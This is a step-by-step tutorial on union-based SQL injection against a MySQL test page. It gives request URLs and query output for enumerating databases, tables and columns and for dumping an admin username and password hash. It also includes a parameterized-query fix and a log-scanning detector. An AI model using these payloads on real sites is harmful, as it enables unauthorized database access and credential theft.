0x00 Overview
Applies when the page has a display position, i.e. a column of the query result that is echoed back into the page.
0x01 Test table data
# Test table: test;
mysql> select * from test;
+----+----------+------+---------+
| id | test     | map  | content |
+----+----------+------+---------+
|  1 | 1        | NULL | NULL    |
| 29 | t        | NULL | NULL    |
| 28 | -        | NULL | NULL    |
| 27 | a        | NULL | NULL    |
|  5 | 2        | NULL | NULL    |
| 26 | 9        | NULL | NULL    |
| 25 | 8        | NULL | NULL    |
| 24 | 7        | NULL | NULL    |
| 23 | 6        | NULL | NULL    |
| 22 | 5        | NULL | NULL    |
| 21 | 4        | NULL | NULL    |
| 14 | 3        | NULL | NULL    |
| 20 | 4        | NULL | NULL    |
| 19 | security | NULL | NULL    |
| 18 | 4        | NULL | NULL    |
+----+----------+------+---------+
15 rows in set (0.00 sec)
# Test admin table: tdb_admin;
mysql> select * from tdb_admin;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 7fef6171469e80d32c0559f88b377245 |
+----+----------+----------------------------------+
1 row in set (0.00 sec)
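To show why the id parameter in the following sections reaches the database as SQL at all, here is an added example (not from the original page) that recreates the two tables above in an in-memory SQLite database and contrasts a query built by string concatenation with one that binds the id as a parameter. SQLite stands in for MySQL so the script runs stand-alone, the rows are a constructed subset, and the two lookup functions are hypothetical names; the payload is the 0x09 read without concat(), which SQLite lacks.

```python
import sqlite3


def make_db():
    """Constructed copy of the two test tables from 0x01 (subset of rows)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        create table test (id integer, test text, map text, content text);
        insert into test values (1, '1', NULL, NULL), (19, 'security', NULL, NULL);
        create table tdb_admin (id integer, username text, password text);
        insert into tdb_admin values (1, 'admin', '7fef6171469e80d32c0559f88b377245');
    """)
    return con


def lookup_vulnerable(con, raw_id):
    """Mirrors sql.php?id=...: the raw parameter is pasted into the SQL text,
    so an id of -1 followed by a UNION returns whatever the UNION selects."""
    return con.execute("select * from test where id=" + raw_id).fetchall()


def lookup_safe(con, raw_id):
    """Hardened form: validate the type first, then bind the value as a
    parameter so it is never parsed as SQL."""
    try:
        id_value = int(raw_id)
    except ValueError:
        return []  # anything that is not an integer id is rejected outright
    return con.execute("select * from test where id=?", (id_value,)).fetchall()


# The same read as 0x09, minus concat(): id=-1 matches nothing, the UNION row shows.
PAYLOAD = "-1 union select 1,username,3,password from tdb_admin limit 0,1"

if __name__ == "__main__":
    con = make_db()
    print(lookup_vulnerable(con, "1"))
    print(lookup_vulnerable(con, PAYLOAD))  # admin row from tdb_admin leaks
    print(lookup_safe(con, PAYLOAD))        # []
```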
0x02 Determine the column count
Web request: http://www.test.com/sql.php?id=1 order by 4
Database query: select * from test where id=1 order by 4
order by N fails once N exceeds the number of columns, so the largest N that still succeeds is the column count.
0x03 Dump the database version
Web request: http://www.test.com/sql.php?id=-1 union select 1, @@VERSION, 3, 4
Database query: select * from test where id=-1 union select 1, @@VERSION, 3, 4
id=-1 matches no row of test, so the only row displayed is the one produced by the UNION.
mysql> select * from test where id=-1 union select 1, @@VERSION, 3, 4;
+----+--------+------+---------+
| id | test   | map  | content |
+----+--------+------+---------+
|  1 | 5.5.53 | 3    | 4       |
+----+--------+------+---------+
1 row in set (0.00 sec)
0x04 Dump the current connection user
Web request: http://www.test.com/sql.php?id=-1 union select 1, user(), 3, 4
Database query: select * from test where id=-1 union select 1, user(), 3, 4;
mysql> select * from test where id=-1 union select 1, user(), 3, 4;
+----+----------------+------+---------+
| id | test           | map  | content |
+----+----------------+------+---------+
|  1 | root@localhost | 3    | 4       |
+----+----------------+------+---------+
1 row in set (0.00 sec)
0x05 Dump the current database
Web request: http://www.test.com/sql.php?id=-1 union select 1, database(), 3, 4
Database query: select * from test where id=-1 union select 1, database(), 3, 4;
mysql> select * from test where id=-1 union select 1, database(), 3, 4;
+----+------+------+---------+
| id | test | map  | content |
+----+------+------+---------+
|  1 | test | 3    | 4       |
+----+------+------+---------+
1 row in set (0.00 sec)
0x06 Dump database names
Note: changing the LIMIT offset shows the other database names
For example:
offset 0 returns the 1st database
offset 1 returns the 2nd database
Web request: http://www.test.com/sql.php?id=-1 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1
Database query: select * from test where id=-1 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1
mysql> select * from test where id=-1 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1;
+----+-------+------+---------+
| id | test  | map  | content |
+----+-------+------+---------+
|  1 | 74cms | 3    | 4       |
+----+-------+------+---------+
1 row in set (0.00 sec)
0x07 Dump table names
Note: changing table_schema=xxx to another database dumps that database's data
For example:
table_schema=database() returns data for the currently connected database
table_schema='test' returns data for the test database
Web request: http://www.test.com/sql.php?id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema=DATABASE() limit 0,1;
Database query: select * from test where id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema=DATABASE() limit 0,1;
mysql> select * from test where id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema=DATABASE() limit 0,1;
+----+-----------+------+---------+
| id | test      | map  | content |
+----+-----------+------+---------+
|  1 | tdb_admin | 3    | 4       |
+----+-----------+------+---------+
1 row in set (0.00 sec)
0x08 Dump column names
table_schema = "xx": the database whose columns are dumped
table_name = "xx": the table whose columns are dumped
limit 0: the position (offset) of the column to dump
For example:
The columns of table tdb_admin are id, username, password
limit 0 = id
limit 1 = username
limit 2 = password
Web request: http://www.test.com/sql.php?id=-1 union select 1,column_name,3,4 from information_schema.columns where table_schema=DATABASE() AND table_name='tdb_admin' limit 1,1;
Database query: select * from test where id=-1 union select 1,column_name,3,4 from information_schema.columns where table_schema=DATABASE() AND table_name='tdb_admin' limit 1,1;
mysql> select * from test where id=-1 union select 1,column_name,3,4 from information_schema.columns where table_schema=DATABASE() AND table_name='tdb_admin' limit 1,1;
+----+----------+------+---------+
| id | test     | map  | content |
+----+----------+------+---------+
|  1 | username | 3    | 4       |
+----+----------+------+---------+
1 row in set (0.01 sec)
0x09 Dump row contents
Note: the limit offset selects which row is displayed
limit 0 is the first row
limit 1 is the second row
Web request: http://www.test.com/sql.php?id=-1 union select 1,concat(0x7e,id,0x3a,username,0x3a,password,0x7e),3,4 from test.tdb_admin limit 0,1
Database query: select * from test where id=-1 union select 1,concat(0x7e,<column>,0x3a,<column>,0x3a,<column>,0x7e),3,4 from <database>.<table> limit 0,1;
0x7e and 0x3a are the ~ and : delimiters, which is why the output appears as ~id:username:password~.
mysql> select * from test where id=-1 union select 1,concat(0x7e,id,0x3a,username,0x3a,password,0x7e),3,4 from test.tdb_admin limit 0,1;
+----+--------------------------------------------+------+---------+
| id | test                                       | map  | content |
+----+--------------------------------------------+------+---------+
|  1 | ~1:admin:7fef6171469e80d32c0559f88b377245~ | 3    | 4       |
+----+--------------------------------------------+------+---------+
1 row in set (0.00 sec)
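From the defender's side, the sequence in 0x02 through 0x09 leaves a recognisable trail in the web server's access log. The following is an added example, not part of the original page: it URL-decodes each query parameter and labels a request with the stages it matches (column-count probe, UNION read, information_schema enumeration, server fingerprint, delimited concat). The log lines are constructed in Apache combined format and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Signatures for the stages walked through above. Checked in order; a request
# is labelled with every stage it matches.
SIGNATURES = [
    ("column-count probe", re.compile(r"\border\s+by\s+\d+\b", re.I)),
    ("union-based read", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("schema enumeration", re.compile(r"\binformation_schema\.", re.I)),
    ("server fingerprint", re.compile(r"@@version|\b(?:user|database)\s*\(\s*\)", re.I)),
    ("delimited concat", re.compile(r"\bconcat\s*\(\s*0x[0-9a-f]+", re.I)),
]

# Request line as it appears inside the quotes of a combined-format log entry.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')


def classify_target(target):
    """Return (param_name, [labels]) for the first suspicious query value, else None."""
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        text = re.sub(r"\s+", " ", value)  # parse_qsl already decodes '+' and %XX
        labels = [label for label, pattern in SIGNATURES if pattern.search(text)]
        if labels:
            return name, labels
    return None


def scan_log(log_text):
    """Return (line_no, client_ip, param, [labels]) for each flagged log line."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        verdict = classify_target(m.group(1))
        if verdict:
            hits.append((line_no, line.split(" ", 1)[0]) + verdict)
    return hits


# Constructed sample entries (not from the original page); the last is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /sql.php?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2023:13:55:40 +0000] "GET /sql.php?id=1%20order%20by%204 HTTP/1.1" 200 512
10.0.0.5 - - [10/Oct/2023:13:55:45 +0000] "GET /sql.php?id=-1%20union%20select%201,@@VERSION,3,4 HTTP/1.1" 200 498
10.0.0.5 - - [10/Oct/2023:13:56:01 +0000] "GET /sql.php?id=-1+union+select+1,schema_name,3,4+from+information_schema.schemata+limit+1,1 HTTP/1.1" 200 501
10.0.0.9 - - [10/Oct/2023:13:57:00 +0000] "GET /search.php?q=union+station HTTP/1.1" 200 2048
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Because the stages run on the same id parameter in order, a single client whose requests move from "column-count probe" to "union-based read" within a short window is a stronger signal than any one line on its own.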